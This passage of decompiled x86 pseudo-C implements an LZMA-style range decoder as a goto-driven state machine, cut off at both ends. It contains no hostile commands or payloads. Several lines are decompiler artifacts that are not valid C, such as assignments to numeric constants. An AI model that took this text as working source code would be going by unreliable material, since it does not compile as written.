                                                                                                                        											if( *(__ebp - 0x38) >= 4) {
                                                                                                                        												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                        												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                        													_t98 = __ebp - 0x38;
                                                                                                                        													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                        													__eflags =  *_t98;
                                                                                                                        												} else {
                                                                                                                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                        												}
                                                                                                                        											} else {
                                                                                                                        												 *(__ebp - 0x38) = 0;
                                                                                                                        											}
                                                                                                                        											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                        											if( *(__ebp - 0x34) == __edx) {
                                                                                                                        												__ebx = 0;
                                                                                                                        												__ebx = 1;
                                                                                                                        												goto L61;
                                                                                                                        											} else {
                                                                                                                        												__eax =  *(__ebp - 0x14);
                                                                                                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        													__eflags = __eax;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 8);
                                                                                                                        												__ebx = 0;
                                                                                                                        												__ebx = 1;
                                                                                                                        												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                        												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                        												goto L41;
                                                                                                                        											}
                                                                                                                        										case 7:
                                                                                                                        											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                        											if( *(__ebp - 0x40) != 1) {
                                                                                                                        												__eax =  *(__ebp - 0x24);
                                                                                                                        												 *(__ebp - 0x80) = 0x16;
                                                                                                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                        												__eax =  *(__ebp - 0x28);
                                                                                                                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                        												__eax =  *(__ebp - 0x2c);
                                                                                                                        												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                        												__eax = 0;
                                                                                                                        												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                        												__al = __al & 0x000000fd;
                                                                                                                        												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                        												__eax =  *(__ebp - 4);
                                                                                                                        												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                        												__eflags = __eax;
                                                                                                                        												 *(__ebp - 0x58) = __eax;
                                                                                                                        												goto L69;
                                                                                                                        											}
                                                                                                                        											__eax =  *(__ebp - 4);
                                                                                                                        											__ecx =  *(__ebp - 0x38);
                                                                                                                        											 *(__ebp - 0x84) = 8;
                                                                                                                        											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                        											goto L132;
                                                                                                                        										case 8:
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												__eax =  *(__ebp - 4);
                                                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                                                        												 *(__ebp - 0x84) = 0xa;
                                                                                                                        												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                        											} else {
                                                                                                                        												__eax =  *(__ebp - 0x38);
                                                                                                                        												__ecx =  *(__ebp - 4);
                                                                                                                        												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                        												 *(__ebp - 0x84) = 9;
                                                                                                                        												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                        												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                        											}
                                                                                                                        											goto L132;
                                                                                                                        										case 9:
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												goto L90;
                                                                                                                        											}
                                                                                                                        											__eflags =  *(__ebp - 0x60);
                                                                                                                        											if( *(__ebp - 0x60) == 0) {
                                                                                                                        												goto L171;
                                                                                                                        											}
                                                                                                                        											__eax = 0;
                                                                                                                        											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                        											__eflags = _t259;
                                                                                                                        											0 | _t259 = _t259 + _t259 + 9;
                                                                                                                        											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                        											goto L76;
                                                                                                                        										case 0xa:
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												__eax =  *(__ebp - 4);
                                                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                                                        												 *(__ebp - 0x84) = 0xb;
                                                                                                                        												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                        												goto L132;
                                                                                                                        											}
                                                                                                                        											__eax =  *(__ebp - 0x28);
                                                                                                                        											goto L89;
                                                                                                                        										case 0xb:
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												__ecx =  *(__ebp - 0x24);
                                                                                                                        												__eax =  *(__ebp - 0x20);
                                                                                                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                        											} else {
                                                                                                                        												__eax =  *(__ebp - 0x24);
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x28);
                                                                                                                        											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                        											L89:
                                                                                                                        											__ecx =  *(__ebp - 0x2c);
                                                                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                                                                        											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                        											L90:
                                                                                                                        											__eax =  *(__ebp - 4);
                                                                                                                        											 *(__ebp - 0x80) = 0x15;
                                                                                                                        											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                        											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                        											goto L69;
                                                                                                                        										case 0xc:
                                                                                                                        											L100:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0xc;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t335 = __ebp - 0x70;
                                                                                                                        											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t335;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											__eax =  *(__ebp - 0x2c);
                                                                                                                        											goto L102;
                                                                                                                        										case 0xd:
                                                                                                                        											L37:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0xd;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t122 = __ebp - 0x70;
                                                                                                                        											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t122;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											L39:
                                                                                                                        											__eax =  *(__ebp - 0x40);
                                                                                                                        											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                        												goto L48;
                                                                                                                        											}
                                                                                                                        											__eflags = __ebx - 0x100;
                                                                                                                        											if(__ebx >= 0x100) {
                                                                                                                        												goto L54;
                                                                                                                        											}
                                                                                                                        											L41:
                                                                                                                        											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                        											__ecx =  *(__ebp - 0x58);
                                                                                                                        											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                        											 *(__ebp - 0x48) = __eax;
                                                                                                                        											__eax = __eax + 1;
                                                                                                                        											__eax = __eax << 8;
                                                                                                                        											__eax = __eax + __ebx;
                                                                                                                        											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        											__ax =  *__esi;
                                                                                                                        											 *(__ebp - 0x54) = __esi;
                                                                                                                        											__edx = __ax & 0x0000ffff;
                                                                                                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        												__cx = __ax;
                                                                                                                        												 *(__ebp - 0x40) = 1;
                                                                                                                        												__cx = __ax >> 5;
                                                                                                                        												__eflags = __eax;
                                                                                                                        												__ebx = __ebx + __ebx + 1;
                                                                                                                        												 *__esi = __ax;
                                                                                                                        											} else {
                                                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                        												 *(__ebp - 0x10) = __ecx;
                                                                                                                        												0x800 = 0x800 - __edx;
                                                                                                                        												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                        												__ebx = __ebx + __ebx;
                                                                                                                        												 *__esi = __cx;
                                                                                                                        											}
                                                                                                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        											 *(__ebp - 0x44) = __ebx;
                                                                                                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        												goto L39;
                                                                                                                        											} else {
                                                                                                                        												goto L37;
                                                                                                                        											}
                                                                                                                        										case 0xe:
                                                                                                                        											L46:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0xe;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t156 = __ebp - 0x70;
                                                                                                                        											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t156;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											while(1) {
                                                                                                                        												L48:
                                                                                                                        												__eflags = __ebx - 0x100;
                                                                                                                        												if(__ebx >= 0x100) {
                                                                                                                        													break;
                                                                                                                        												}
                                                                                                                        												__eax =  *(__ebp - 0x58);
                                                                                                                        												__edx = __ebx + __ebx;
                                                                                                                        												__ecx =  *(__ebp - 0x10);
                                                                                                                        												__esi = __edx + __eax;
                                                                                                                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        												__ax =  *__esi;
                                                                                                                        												 *(__ebp - 0x54) = __esi;
                                                                                                                        												__edi = __ax & 0x0000ffff;
                                                                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        													__cx = __ax;
                                                                                                                        													_t170 = __edx + 1; // 0x1
                                                                                                                        													__ebx = _t170;
                                                                                                                        													__cx = __ax >> 5;
                                                                                                                        													__eflags = __eax;
                                                                                                                        													 *__esi = __ax;
                                                                                                                        												} else {
                                                                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                                                                        													0x800 = 0x800 - __edi;
                                                                                                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        													__ebx = __ebx + __ebx;
                                                                                                                        													 *__esi = __cx;
                                                                                                                        												}
                                                                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        													continue;
                                                                                                                        												} else {
                                                                                                                        													goto L46;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											L54:
                                                                                                                        											_t173 = __ebp - 0x34;
                                                                                                                        											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                        											__eflags =  *_t173;
                                                                                                                        											goto L55;
                                                                                                                        										case 0xf:
                                                                                                                        											L58:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0xf;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t203 = __ebp - 0x70;
                                                                                                                        											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t203;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											L60:
                                                                                                                        											__eflags = __ebx - 0x100;
                                                                                                                        											if(__ebx >= 0x100) {
                                                                                                                        												L55:
                                                                                                                        												__al =  *(__ebp - 0x44);
                                                                                                                        												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                        												goto L56;
                                                                                                                        											}
                                                                                                                        											L61:
                                                                                                                        											__eax =  *(__ebp - 0x58);
                                                                                                                        											__edx = __ebx + __ebx;
                                                                                                                        											__ecx =  *(__ebp - 0x10);
                                                                                                                        											__esi = __edx + __eax;
                                                                                                                        											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        											__ax =  *__esi;
                                                                                                                        											 *(__ebp - 0x54) = __esi;
                                                                                                                        											__edi = __ax & 0x0000ffff;
                                                                                                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        												__cx = __ax;
                                                                                                                        												_t217 = __edx + 1; // 0x1
                                                                                                                        												__ebx = _t217;
                                                                                                                        												__cx = __ax >> 5;
                                                                                                                        												__eflags = __eax;
                                                                                                                        												 *__esi = __ax;
                                                                                                                        											} else {
                                                                                                                        												 *(__ebp - 0x10) = __ecx;
                                                                                                                        												0x800 = 0x800 - __edi;
                                                                                                                        												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        												__ebx = __ebx + __ebx;
                                                                                                                        												 *__esi = __cx;
                                                                                                                        											}
                                                                                                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        											 *(__ebp - 0x44) = __ebx;
                                                                                                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        												goto L60;
                                                                                                                        											} else {
                                                                                                                        												goto L58;
                                                                                                                        											}
                                                                                                                        										case 0x10:
                                                                                                                        											L110:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0x10;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t366 = __ebp - 0x70;
                                                                                                                        											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t366;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											goto L112;
                                                                                                                        										case 0x11:
                                                                                                                        											L69:
                                                                                                                        											__esi =  *(__ebp - 0x58);
                                                                                                                        											 *(__ebp - 0x84) = 0x12;
                                                                                                                        											L132:
                                                                                                                        											 *(_t612 - 0x54) = _t605;
                                                                                                                        											goto L133;
                                                                                                                        										case 0x12:
                                                                                                                        											goto L0;
                                                                                                                        										case 0x13:
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												_t469 = __ebp - 0x58;
                                                                                                                        												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                        												__eflags =  *_t469;
                                                                                                                        												 *(__ebp - 0x30) = 0x10;
                                                                                                                        												 *(__ebp - 0x40) = 8;
                                                                                                                        												goto L144;
                                                                                                                        											}
                                                                                                                        											__eax =  *(__ebp - 0x4c);
                                                                                                                        											__ecx =  *(__ebp - 0x58);
                                                                                                                        											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                        											 *(__ebp - 0x30) = 8;
                                                                                                                        											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                        											goto L130;
                                                                                                                        										case 0x14:
                                                                                                                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                        											__eax =  *(__ebp - 0x80);
                                                                                                                        											L140:
                                                                                                                        											 *(_t612 - 0x88) = _t533;
                                                                                                                        											goto L1;
                                                                                                                        										case 0x15:
                                                                                                                        											__eax = 0;
                                                                                                                        											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                        											__al = __al & 0x000000fd;
                                                                                                                        											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                        											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                        											goto L121;
                                                                                                                        										case 0x16:
                                                                                                                        											__eax =  *(__ebp - 0x30);
                                                                                                                        											__eflags = __eax - 4;
                                                                                                                        											if(__eax >= 4) {
                                                                                                                        												_push(3);
                                                                                                                        												_pop(__eax);
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                        											 *(__ebp - 0x40) = 6;
                                                                                                                        											__eax = __eax << 7;
                                                                                                                        											 *(__ebp - 0x7c) = 0x19;
                                                                                                                        											 *(__ebp - 0x58) = __eax;
                                                                                                                        											goto L145;
                                                                                                                        										case 0x17:
                                                                                                                        											goto L145;
                                                                                                                        										case 0x18:
                                                                                                                        											L146:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0x18;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t484 = __ebp - 0x70;
                                                                                                                        											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t484;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											L148:
                                                                                                                        											_t487 = __ebp - 0x48;
                                                                                                                        											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                        											__eflags =  *_t487;
                                                                                                                        											goto L149;
                                                                                                                        										case 0x19:
                                                                                                                        											__eflags = __ebx - 4;
                                                                                                                        											if(__ebx < 4) {
                                                                                                                        												 *(__ebp - 0x2c) = __ebx;
                                                                                                                        												L120:
                                                                                                                        												_t394 = __ebp - 0x2c;
                                                                                                                        												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                                                                                        												__eflags =  *_t394;
                                                                                                                        												L121:
                                                                                                                        												__eax =  *(__ebp - 0x2c);
                                                                                                                        												__eflags = __eax;
                                                                                                                        												if(__eax == 0) {
                                                                                                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                        												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                        													goto L171;
                                                                                                                        												}
                                                                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                        												__eax =  *(__ebp - 0x30);
                                                                                                                        												_t401 = __ebp - 0x60;
                                                                                                                        												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                        												__eflags =  *_t401;
                                                                                                                        												goto L124;
                                                                                                                        											}
                                                                                                                        											__ecx = __ebx;
                                                                                                                        											__eax = __ebx;
                                                                                                                        											__ecx = __ebx >> 1;
                                                                                                                        											__eax = __ebx & 0x00000001;
                                                                                                                        											__ecx = (__ebx >> 1) - 1;
                                                                                                                        											__al = __al | 0x00000002;
                                                                                                                        											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                        											__eflags = __ebx - 0xe;
                                                                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                                                                        											if(__ebx >= 0xe) {
                                                                                                                        												__ebx = 0;
                                                                                                                        												 *(__ebp - 0x48) = __ecx;
                                                                                                                        												L103:
                                                                                                                        												__eflags =  *(__ebp - 0x48);
                                                                                                                        												if( *(__ebp - 0x48) <= 0) {
                                                                                                                        													__eax = __eax + __ebx;
                                                                                                                        													 *(__ebp - 0x40) = 4;
                                                                                                                        													 *(__ebp - 0x2c) = __eax;
                                                                                                                        													__eax =  *(__ebp - 4);
                                                                                                                        													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                        													__eflags = __eax;
                                                                                                                        													L109:
                                                                                                                        													__ebx = 0;
                                                                                                                        													 *(__ebp - 0x58) = __eax;
                                                                                                                        													 *(__ebp - 0x50) = 1;
                                                                                                                        													 *(__ebp - 0x44) = 0;
                                                                                                                        													 *(__ebp - 0x48) = 0;
                                                                                                                        													L113:
                                                                                                                        													__eax =  *(__ebp - 0x40);
                                                                                                                        													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                        													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                        														_t392 = __ebp - 0x2c;
                                                                                                                        														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                        														__eflags =  *_t392;
                                                                                                                        														goto L120;
                                                                                                                        													}
                                                                                                                        													__eax =  *(__ebp - 0x50);
                                                                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                        													__eax =  *(__ebp - 0x58);
                                                                                                                        													__esi = __edi + __eax;
                                                                                                                        													 *(__ebp - 0x54) = __esi;
                                                                                                                        													__ax =  *__esi;
                                                                                                                        													__ecx = __ax & 0x0000ffff;
                                                                                                                        													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                        													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                        													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                        														__ecx = 0;
                                                                                                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                        														__ecx = 1;
                                                                                                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                        														__ebx = 1;
                                                                                                                        														__ecx =  *(__ebp - 0x48);
                                                                                                                        														__ebx = 1 << __cl;
                                                                                                                        														__ecx = 1 << __cl;
                                                                                                                        														__ebx =  *(__ebp - 0x44);
                                                                                                                        														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                        														__cx = __ax;
                                                                                                                        														__cx = __ax >> 5;
                                                                                                                        														__eax = __eax - __ecx;
                                                                                                                        														__edi = __edi + 1;
                                                                                                                        														__eflags = __edi;
                                                                                                                        														 *(__ebp - 0x44) = __ebx;
                                                                                                                        														 *__esi = __ax;
                                                                                                                        														 *(__ebp - 0x50) = __edi;
                                                                                                                        													} else {
                                                                                                                        														 *(__ebp - 0x10) = __edx;
                                                                                                                        														0x800 = 0x800 - __ecx;
                                                                                                                        														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                        														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                        														 *__esi = __dx;
                                                                                                                        													}
                                                                                                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        														L112:
                                                                                                                        														_t369 = __ebp - 0x48;
                                                                                                                        														 *_t369 =  *(__ebp - 0x48) + 1;
                                                                                                                        														__eflags =  *_t369;
                                                                                                                        														goto L113;
                                                                                                                        													} else {
                                                                                                                        														goto L110;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0xc);
                                                                                                                        												__ebx = __ebx + __ebx;
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                        												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                                                                        												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                        													__ecx =  *(__ebp - 0x10);
                                                                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                        													__ebx = __ebx | 0x00000001;
                                                                                                                        													__eflags = __ebx;
                                                                                                                        													 *(__ebp - 0x44) = __ebx;
                                                                                                                        												}
                                                                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        													L102:
                                                                                                                        													_t339 = __ebp - 0x48;
                                                                                                                        													 *_t339 =  *(__ebp - 0x48) - 1;
                                                                                                                        													__eflags =  *_t339;
                                                                                                                        													goto L103;
                                                                                                                        												} else {
                                                                                                                        													goto L100;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											__edx =  *(__ebp - 4);
                                                                                                                        											__eax = __eax - __ebx;
                                                                                                                        											 *(__ebp - 0x40) = __ecx;
                                                                                                                        											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                        											goto L109;
                                                                                                                        										case 0x1a:
                                                                                                                        											L56:
                                                                                                                        											__eflags =  *(__ebp - 0x64);
                                                                                                                        											if( *(__ebp - 0x64) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0x1a;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x68);
